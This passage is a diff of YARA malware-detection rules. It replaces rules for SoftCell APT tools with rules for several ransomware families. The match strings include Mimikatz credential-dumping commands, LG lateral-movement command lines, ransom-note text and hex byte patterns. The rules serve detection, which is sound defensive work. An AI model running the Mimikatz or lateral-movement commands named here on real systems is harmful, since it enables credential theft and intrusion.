??????4932????502F2F2F31??????667A??565A434677??515A67??32????414142414855433677??4C526677??68????????2F2B????667A??31????46454974??434974??454974??4E4474??47484A4D69??????????414969??????????5838????36??6661414164??69??????????????6A??565978??2F31????68????????32????61414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C4249476F4561414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C42494974??45494E34??414231????74??454974??43476F49575776??42594E38????77??64??474C5252434C514169??????????????534A51534472??476F4561414177??41434C5252434C514169??????????????6F412F31????67??????69??????????456769??????????67????48554636??67??4141434C5252434C51416A??63????4C5252442F63????4C5252442F63????6F30????4141495045444974??454974??434974??454974??43412B??5352534E524167??69????????????38????73??69??????????6C462F4974??454974??43412B??51415935????????4F5774??2F4369??????????????45516130????4B4974??454974??454974??6D414E4D4168????????5838????74??454974??494974??6D414E4D416778??36??59424141434478??7A??73??64??6C4145414141417A??412B????50372F2F34??466C4D6E44565976??555974??434974??434974??45496C49424974??434974??42412B??414431????67??4164??517A??4F73??69??????????414569??????????6B??????67??????554969????????????4969??????????68????????4164??517A?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
+		uint16( 0 ) == 0x6441 and all of them
 }
-
-rule TRELLIX_ARC_Trochilus_Softcell : TROJAN FILE
+rule TRELLIX_ARC_RANSOM_Suncrypt_Decryptor : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Trochilus malware used in the SoftCell operation"
-		author = "Trellix ARC Team"
-		id = "81e942ae-936f-5952-8d50-ee8cec74520b"
-		date = "2019-06-25"
-		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L74-L106"
+		description = "Rule to detect SunCrypt ransomware decryptor"
+		author = "McAfee ATR Team"
+		id = "ec0d3811-6083-5537-bf29-32ee02d43b5e"
+		date = "2020-10-02"
+		modified = "2020-11-02"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L27-L50"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "80a0841a08627acf11707f3aeef4e7c3777aecf04b932755efa618d7e92b0cda"
+		logic_hash = "59d1193bb0f8d3983a181394b5dd5247470d9e118cc4fe0674167f162bcdb6e1"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Trochilus"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/Suncrypt"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "a0f99367b0a0a358ed6e5ae25904016d02aef6aa7c0423c34aa3ec3fd6354310"
 
 	strings:
-		$s1 = "Shell.dll" fullword ascii
-		$s2 = "photo.dat" fullword wide
-		$s3 = "VW9HxtV9H|tQ9" fullword ascii
-		$s4 = "G6uEGRich7uEG" fullword ascii
-		$op0 = { e8 9d ad ff ff ff b6 a8 }
-		$op1 = { e8 d4 ad ff ff ff b6 94 }
-		$op2 = { e8 ea ad ff ff ff b6 8c }
+		$pattern = { 558BEC81EC88000000837D08008BC10F101A89957CFFFFFF0F104A10898578FFFFFF0F1062200F106A300F115D940F114DA40F1165B40F116DC40F8E340200008B45D08B4DC48B55B08945F88B45CC8945E08B45C88945E88B45C08945F08B45BC8945F48B45B8538B5DA88945EC8B45AC568B75A48945D48B45A0578975DC8945E48B459403C68BF033F18B4DB4C1C61003CE8BF9337DDCC1C70C03C78945DC33C6C1C0088945D803C18B4DEC89458833C7C1C0078945848B459803C38BF03375E8C1C61003CE8BF933FBC1C70C03C78945E833C6C1C00889458C03C18B4DF48BD88945EC33DF8B459C0345D48B7DE48BF03375E003FAC1C61003CEC1C307894DF4334DD4C1C10C03C133F08945908B45F0C1C6088975800375F433CEC1C107894DE08B4DF833CFC1C11003C133D08945F0C1C20C8D043A8B7DF033C88945E48B45DCC1C10803F9894DF833D7C1C20703C38BC8334DF8C1C11003F18975FC315DFC8B5DFCC1C30C03C389459433C1C1C0088945F88945D003C633D88945F48945BC8B45E80345E08BC8C1C307334DD8C1C110895DFC895DA88B5DEC8D340F8BFE337DE0C1C70C03C789459833C1C1C0088945D88945C403C68B758833F88945F08945C08B459003C2C1C7078BC8897DD4334D8CC1C11003F1897DAC8B7DE433D6037D84C1C20C03C289459C33C1C1C0088945E88945C803C633D08945B48BC7C1C207334580C1C01003D88BCB334D84C1C10C03F98BF7897DE433F0897DA0C1C60803DE8975E08975CC895DEC8B45088BF333F1895DB88B5DFC488B4DD8C1C6078975DC8975A489450885C00F8F30FEFFFF0F106DC48B8578FFFFFF0F1065B45F0F105D948955B00F104DA48B957CFFFFFF5E5B0F10020F105210660FFED80F104230660FFED10F104A200F1118660FFECC660FFEC50F1150100F1148200F1140308BE55DC3CCCCCCCCCCCCCCCCCCCC558BEC83E4F081EC58020000568BC18B4D1489442420578BFA897C24283D000100000F82680A0000660F6E07660F70C800660F6E4704660F70D000660F6E4708660F70D800660F6E470C660F70E000660F6E4710660F70E800660F6E47148B7508660F70F000660F6E47188B550C660F70F8008D8EC0000000660F6E471C660F70C0000F29842430010000660F6E4720660F70C0000F29842440010000660F6E4724660F70C0000F29842450010000660F6E4728660F70C0000F29842460010000660F6E472C894C240C8D8AC0000000660F70C000894C241C8D8E800000000F29842470010000660F6E4738894C24148D8A80000000660F70C000894C24188D4E400F29842480010000660F6E473C894C242C8D4A40660F70C000C1E8080F298C24A00100000F299424B00100000F299C24C00100000F29A424D00100000F29AC24E00100000F29B424F00100000F29BC24000200000F29842490010000894C24108944242066660F1F8400000000000F2884243001000033C00B47308B4F340F298424800000000F288424400100000F298424900000000F288424500100000F294424600F288424600100000F298424100100000F28842470010000894C244C8944244883C0040F298C24D0000000F30F7E4C244883D1000F298424200100000F288424900100000F299424E00000000F2815A02B4200660F6CC90F29442430660FD4D10F2805B02B42000F29A424A0000000660FD4C10F28E20F29B42400010000660F62E0660F6AD00F28F40F299C24F00000000F28DD0F28AC2480010000660F62F20F297C24700F28FE660F6AE2894F348B4D140F295C24500F29AC24C00000000F29A424B00000000F29BC24400200000F29A4245002000089473085C90F84820400000F287C24708BC166900F28D3660FFE9424D0000000660FEFF2660F380035C02B42000F28DE660FFE9C24900000000F28C3660FEF4424500F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942400010000660FFE9424E0000000660FEFF0660F380035D02B42000F29842490000000660FEFE2660F380025C02B42000F28C60F29742470660FFEC30F28DC660FFE5C24600F29842410020000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424000100000F298C24200200000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D7660FFE9424F0000000660FEFE0660F380025D02B42000F29442460660FEFEA660F38002DC02B42000F28C40F29A424B0000000660FFEC30F28DD660FFE9C24100100000F29842430020000660FEFC10F28F0660F72F007660F72D619660FEBF00F28C3660FEFC70F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FFE9424A0000000660FEFE8660F38002DD02B42000F294424500F28E50F29AC24C0000000660FFEE30F28C4660FEFC10F28F8660F72F007660F72D719660FEBF80F286C2430660FEFEA660F38002DC02B42000F28DD660FFE9C24200100000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D6660FEFE8660FFE942490000000660F38002DD02B42000F298424A00000000F296C2430660FFEEB0F28C5660FEFC10F28C8660F72F007660F72D119660FEBC80F28442430660FEFC20F298C2480000000660F380005C02B42000F28D80F29442430660FFEDC0F28C3660FEFC60F287424700F28C8660F72F00C660F72D114660FEBC80F284424300F28E1660FFEE20F28D7660FFE542460660FEFC4660F380005D02B4200660FEFF20F29A424D0000000660F380035C02B42000F29442430660FFEC30F298424100100000F28DE660FEFC1660FFEDD0F28C8660F72F007660F72D119660FEBC80F28C3660FEFC70F298C24000100000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FEFF00F298424E0000000660F380035D02B42000F28C6660FFEC30F29842420010000660FEFC10F28F8660F72F007660F72D719660FEBF8660FFE5424500F28A424B00000000F28AC24C0000000660FEFE2660F380025C02B42000F28DC660FFE9C24100200000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942420020000660FFE9424A0000000660FEFE00F298424F0000000660FEFEA660F380025D02B4200660F38002DC02B42000F29A424B00000000F28C4660FFEC30F28DD660FFE9C24300200000F29842490000000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424200200000F298C24800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F298424A0000000660FEFE8660F38002DD02B42000F29AC24C00000000F28C5660FFEC30F29442460660FEFC10F28D8660F72F007660F72D319660FEBD80F295C245083E8010F8594FBFFFF0F297C24700F28BC24400200000F28AC24A0010000660FFEAC24D00000000F28A424C00100000F28DD660FFEA424F00000000F288C24B00100000F28D4660FFE8C24E00000000F288424D0010000660FFE8424A00000008B44242C8B7C2414660F62D9660F6AE90F28CB660F6AE0660F62D00F10068344241410660F6CCA660FEFC8660F6DDA0F110A0F10008B4424100F28CD660F6DEC660FEFD8660F6CCC0F28A424000200000F111883C0100F10078B7C2418660FFE642470660FEFC883442418100F28D4894424100F110F8B7C240C0F288C24F0010000660FFE8C24000100008344240C100F10078B7C241C8344241C10660FEFE80F28842430010000660FFE8424800000000F112F8B7C242C0F28AC24E0010000660FFE6C24500F28DD660F62D0660F62D9660F6AE90F28CB660F6AE00F104610660F6CCA660FEFC8660F6DDA0F114A100F1047100F28CD660F6DEC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFE80F11280F28AC2440010000660FFEFE660FFEAC24900000000F28A424600100000F28DD660FFEA424100100000F288C24500100000F28D4660FFE4C24600F28842470010000660FFE84242001000083442410108B4424108344241410660F62D98344241810660F6AE90F28CB660F6AE0660F62D00F1046208344240C10660F6CCA660FEFC88344241C100F114A200F104720660F6DDA0F28CD660FEFD8660F6CCC0F11188B44241483442414100F28DF660F6DEC0F28A424800100000F10008B442418660FFEA424C0000000660FEFC883442418100F28D40F11088B44240C0F288C2450020000660FFE8C24B00000008344240C100F10008B44241C660F62D9660FEFE8660F6AF90F288424900100000F28CB660FFE4424300F11288B442410660F62D083C010660F6AE00F1046308344241C10660F6CCA660FEFC8660F6DDA0F114A30894424100F1047300F28CF660F6DFC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFF881442410D000000081C70001000081442418D000000081C2000100008144241CD000000081C60001000081442414D00000008144240CD00000000F288C24A00100000F289424B00100000F289C24C00100000F28A424D00100000F28AC24E00100000F28B424F00100000F11388B4424240F28BC24000200002D00010000836C242001897C242C8B7C2428894424240F85E2F6FFFFEB068B550C8B75088954241083F8400F829A010000C1E80689442420660F1F4400000F10370F1057100F107F200F106F3085C90F84F60000008BC10F1F80000000000F28DA660FFEDE660FEFEB660F38002DC02B42000F28E5660FFEE70F28C4660FEFC20F28C8660F72F00C660F72D114660FEFC80F28D1660FFED3660FEFEA660F70D293660F38002DD02B42000F28DD660F70ED4E660FFEDC660F70E3390F28C3660FEFC10F28C8660F72F007660F72D119660FEFC8660FFED1660FEFEA660F38002DC02B4200660FFEE50F28C4660FEFC10F28D8660F72F00C660F72D314660FEFD80F28C3660FFEC2660F70F039660FEFE8660F38002DD02B42000F28C5660F70ED4E660FFEC4660F70F8930F28C8660FEFCB0F28D1 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8e13ebc144667958722686cb04ee16f8" and ( pe.exports ( "Entry" ) and pe.exports ( "Main" ) ) and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-
-rule TRELLIX_ARC_Lg_Utility_Lateral_Movement_Softcell : UTILITY FILE
+rule TRELLIX_ARC_Unpacked_Shiva_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the utility LG from Joeware to do Lateral Movement in the SoftCell operation"
+		description = "Rule to detect an unpacked sample of Shiva ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "4f435348-427a-5f35-9545-5582033eb043"
-		date = "2019-06-25"
+		id = "c6cd4421-216f-5c1f-bb8d-fc8ab00bb72d"
+		date = "2018-09-05"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L108-L143"
+		reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Shiva.yar#L1-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f88781b9632cd31bb9e3d68730c63c3fcd0ebe4a09b70b5b54d456cdc9ae8d01"
+		hash = "299bebcb18e218254960ef96c2e65a4dc1945dcdfe9fc68550022f99a474f56d"
+		logic_hash = "8a6a1d9f3b75617d8f07489ecf2867f90ddcf9fbe1db1e7c0f5c26833f88be3f"
 		score = 75
-		quality = 70
-		tags = "UTILITY, FILE"
+		quality = 66
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "utility"
-		malware_family = "Utility:W32/Joeware"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Shiva"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "lg \\\\comp1\\users louise -add -r comp3" fullword ascii
-		$s2 = "lg \\\\comp1\\users S-1-5-567-678-89765-456 -sid -add" fullword ascii
-		$s3 = "lg \\\\comp1\\users -sidsout" fullword ascii
-		$s4 = "Enumerates members of localgroup users on localhost" fullword ascii
-		$s5 = "Adds SID resolved at comp3 for louise to localgroup users on comp1" fullword ascii
-		$s6 = "CodeGear C++ - Copyright 2008 Embarcadero Technologies" fullword ascii
-		$s7 = "Lists members of localgroup users on comp1 in SID format" fullword ascii
-		$s8 = "ERROR: Verify that CSV lines are available in PIPE input. " fullword ascii
-		$op0 = { 89 43 24 c6 85 6f ff ff ff 00 83 7b 24 10 72 05 }
-		$op1 = { 68 f8 0e 43 00 e8 8d ff ff ff 83 c4 20 68 f8 0e }
-		$op2 = { 66 c7 85 74 ff ff ff 0c 00 8d 55 d8 52 e8 e9 eb }
+		$s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii
+		$s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide
+		$s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide
+		$s4 = "write.php?info=" fullword wide
+		$s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide
+		$s6 = " * Do not rename encrypted files." fullword wide
+		$s7 = ".compositiontemplate" fullword wide
+		$s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide
+		$s9 = "\\READ_IT.txt" fullword wide
+		$s10 = ".lastlogin" fullword wide
+		$s11 = ".logonxp" fullword wide
+		$s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide
+		$s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "327ce3f883a5b59e966b5d0e3a321156" and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB ) and all of them
 }
-
-rule TRELLIX_ARC_Mangzamel_Softcell : TROJAN FILE
+rule TRELLIX_ARC_RANSOM_Makop : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Mangzamel used in the SoftCell operation"
+		description = "Rule to detect the unpacked Makop ransomware samples"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b0473362-7e03-5127-aee5-b5a4f05bcc8e"
-		date = "2019-06-25"
+		id = "2828f2f9-4702-5cef-8b4e-7e98146c0332"
+		date = "2020-07-19"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L145-L176"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_makop.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "3666c645943eb8469096b8093c74e4d819299d3ffc2b99e37a506d8ef09e90c4"
+		hash = "008e4c327875110b96deef1dd8ef65cefa201fef60ca1cbb9ab51b5304e66fe1"
+		logic_hash = "2b4f8b90d46530421b66dbb04df6e84d268709fbee884536d8acc91e1b85f8a4"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Mangzamel"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Makop"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Change Service Mode to user logon failure.code:%d" fullword ascii
-		$s2 = "spoolsvs.exe" fullword wide
-		$s3 = "System\\CurrentControlSet\\Services\\%s\\parameters\\%s" fullword ascii
-		$s4 = "Please Correct [-s %s]" fullword ascii
-		$s5 = "Please Correct [-m %s]" fullword ascii
-		$op0 = { 59 8d 85 64 ff ff ff 50 c7 85 64 ff ff ff 94 }
-		$op1 = { c9 c2 08 00 81 c1 30 34 00 00 e9 cf 9b ff ff 55 }
-		$op2 = { 80 0f b6 b5 68 ff ff ff c1 e2 04 0b d6 0f b6 b5 }
+		$pattern_0 = { 50 8d7c2420 e8???????? 84c0 0f84a6020000 8b742460 ba???????? }
+		$pattern_1 = { 51 52 53 ffd5 85c0 746d 8b4c240c }
+		$pattern_2 = { 7521 68000000f0 6a18 6a00 6a00 56 ff15???????? }
+		$pattern_3 = { 83c40c 8d4e0c 51 66c7060802 66c746041066 c6460820 }
+		$pattern_4 = { 51 ffd3 50 ffd7 8b4628 85c0 }
+		$pattern_5 = { 85c9 741e 8b4508 8b4d0c 8a11 }
+		$pattern_6 = { 83c002 6685c9 75f5 2bc6 d1f8 66390c46 8d3446 }
+		$pattern_7 = { 895a2c 8b7f04 85ff 0f85f7feffff 55 6a00 }
+		$pattern_8 = { 8b3d???????? 6a01 6a00 ffd7 50 ff15???????? }
+		$pattern_9 = { 85c0 7407 50 ff15???????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ef64bb4aa42ef5a8a2e3858a636bce40" and all of them )
+		7 of them and filesize < 237568
 }
-
-rule TRELLIX_ARC_Nbtscan_Utility_Softcell : UTILITY FILE
+rule TRELLIX_ARC_Screenlocker_Acroware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect nbtscan utility used in the SoftCell operation"
+		description = "Rule to detect the ScreenLocker Acroware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "a2a8dd43-0d30-5da5-9dd3-6ba9f6473c40"
-		date = "2019-06-25"
+		id = "76eb69eb-dfe7-5629-bf2d-d20574efd662"
+		date = "2018-08-28"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L178-L209"
+		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_acroware.yar#L1-L29"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "6079f1363578f82fd38971d0c8f69cc156f7f678c3f2be22c5d9c3748dc80b1f"
+		hash = "f9efcfc5328e6502cbbbff752a940ac221e437d8732052fc265618f6a6ad72ae"
+		logic_hash = "582f3544cf1f8066b1e9ac04c3a4cc9f0ba96804ca53bc3746b433df9c33e0a1"
 		score = 75
-		quality = 45
-		tags = "UTILITY, FILE"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "utility"
-		malware_family = "Utility:W32/NbtScan"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Acroware"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/" fullword ascii
-		$s2 = "parse_target_cb.c" fullword ascii
-		$s3 = "ranges. Ranges can be in /nbits notation (\"192.168.12.0/24\")" fullword ascii
-		$s4 = "or with a range in the last octet (\"192.168.12.64-97\")" fullword ascii
-		$op0 = { 52 68 d4 66 40 00 8b 85 58 ff ff ff 50 ff 15 a0 }
-		$op1 = { e9 1c ff ff ff 8b 45 fc 8b e5 5d c3 cc cc cc cc }
-		$op2 = { 59 59 c3 8b 65 e8 ff 75 d0 ff 15 34 60 40 00 ff }
+		$s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii
+		$s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii
+		$s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii
+		$s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s5 = "webserver, after 72 hours thedecryption key will get removed and your personal" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2fa43c5392ec7923ababced078c2f98d" and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
 }
-
-rule TRELLIX_ARC_Mimikatz_Utility_Softcell : HACKTOOL FILE
+rule TRELLIX_ARC_Pico_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Mimikatz utility used in the SoftCell operation"
+		description = "Rule to detect Pico Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "0c01a2f6-cf3c-57b3-8f19-94d320422658"
-		date = "2019-06-25"
+		id = "843cac7a-652e-5cbf-a09d-fb4b1eaa8481"
+		date = "2018-08-30"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L211-L258"
+		reference = "https://twitter.com/siri_urz/status/1035138577934557184"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Pico.yar#L1-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "4ccb44bf0d490a18e35290d904326ce14cdc92c96be1a38e6059431645233e37"
+		hash = "cc4a9e410d38a29d0b6c19e79223b270e3a1c326b79c03bec73840b37778bc06"
+		logic_hash = "bb15e66504f393bcb4b173cb2a4ec65aa13110060f7fb70282330b5f6d72f5ed"
 		score = 75
-		quality = 68
-		tags = "HACKTOOL, FILE"
+		quality = 20
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "hacktool"
-		malware_family = "Hacktool:W32/Mimikatz"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Pico"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "livessp.dll" fullword wide
-		$s2 = "\\system32\\tapi32.dll" fullword wide
-		$s3 = " * Process Token : " fullword wide
-		$s4 = "lsadump" fullword wide
-		$s5 = "-nl - skip lsa dump..." fullword wide
-		$s6 = "lsadump::sam" fullword wide
-		$s7 = "lsadump::lsa" fullword wide
-		$s8 = "* NL$IterCount %u, %u real iter(s)" fullword wide
-		$s9 = "* Iter to def (%d)" fullword wide
-		$s10 = " * Thread Token  : " fullword wide
-		$s11 = " * RootKey  : " fullword wide
-		$s12 = "lsadump::cache" fullword wide
-		$s13 = "sekurlsa::logonpasswords" fullword wide
-		$s14 = "(commandline) # %s" fullword wide
-		$s15 = ">>> %s of '%s' module failed : %08x" fullword wide
-		$s16 = "UndefinedLogonType" fullword wide
-		$s17 = " * Username : %wZ" fullword wide
-		$s18 = "logonPasswords" fullword wide
-		$s19 = "privilege::debug" fullword wide
-		$s20 = "token::elevate" fullword wide
-		$op0 = { e8 0b f5 00 00 90 39 35 30 c7 02 00 75 34 48 8b }
-		$op1 = { eb 34 48 8b 4d cf 48 8d 45 c7 45 33 c9 48 89 44 }
-		$op2 = { 48 3b 0d 34 26 01 00 74 05 e8 a9 31 ff ff 48 8b }
+		$s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii
+		$s2 = "\\Downloads\\README.txt" fullword ascii
+		$s3 = "\\Music\\README.txt" fullword ascii
+		$s4 = "\\Videos\\README.txt" fullword ascii
+		$s5 = "\\Pictures\\README.txt" fullword ascii
+		$s6 = "\\Desktop\\README.txt" fullword ascii
+		$s7 = "\\Documents\\README.txt" fullword ascii
+		$s8 = "/c taskkill /im " fullword ascii
+		$s9 = "\\AppData\\Roaming\\" fullword ascii
+		$s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide
+		$s11 = "AppData\\Roaming" fullword ascii
+		$s12 = "\\Downloads" fullword ascii
+		$s13 = "operator co_await" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "169e02f00c6fb64587297444b6c41ff4" and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB ) and all of them
 }
-
-rule TRELLIX_ARC_Sfx_Winrar_Plugx : BUILDER FILE
+rule TRELLIX_ARC_Locdoor_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the SFX WinRAR delivering a possible Plugx sample"
+		description = "Rule to detect Locdoor/DryCry"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "ac975a58-6a8a-515e-b27f-327a7bfc7686"
-		date = "2019-06-25"
+		id = "d855d7fd-a1e3-561e-906e-103752285b0f"
+		date = "2018-09-02"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L260-L307"
+		reference = "https://twitter.com/leotpsc/status/1036180615744376832"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_locdoor.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8231f46330762cecf8a796d1a29c8fa6ba1c10b527fa86bf6c73130349558dad"
+		hash = "0000c55f7cdbbad9bacba0e79637696f3bfeb95a5f71dfa0b398bc77a207eb41"
+		logic_hash = "c9519279a929feedae2bab58cd0de91f6c447827fa59afa927726fde84d21e1c"
 		score = 75
-		quality = 68
-		tags = "BUILDER, FILE"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "builder"
-		malware_family = "Builder:W32/Plugx"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Locdoor"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
-		$s2 = "Wrong password for %s5Write error in the file %s. Probably the disk is full" fullword wide
-		$s3 = "mcutil.dll" fullword ascii
-		$s4 = "Unexpected end of archiveThe file \"%s\" header is corrupt%The archive comment header is corrupt" fullword wide
-		$s5 = "mcoemcpy.exe" fullword ascii
-		$s6 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
-		$s7 = "&Enter password for the encrypted file:" fullword wide
-		$s8 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
-		$s9 = "setup.bat" fullword ascii
-		$s10 = "ErroraErrors encountered while performing the operation" fullword wide
-		$s11 = "Please download a fresh copy and retry the installation" fullword wide
-		$s12 = "antivir.dat" fullword ascii
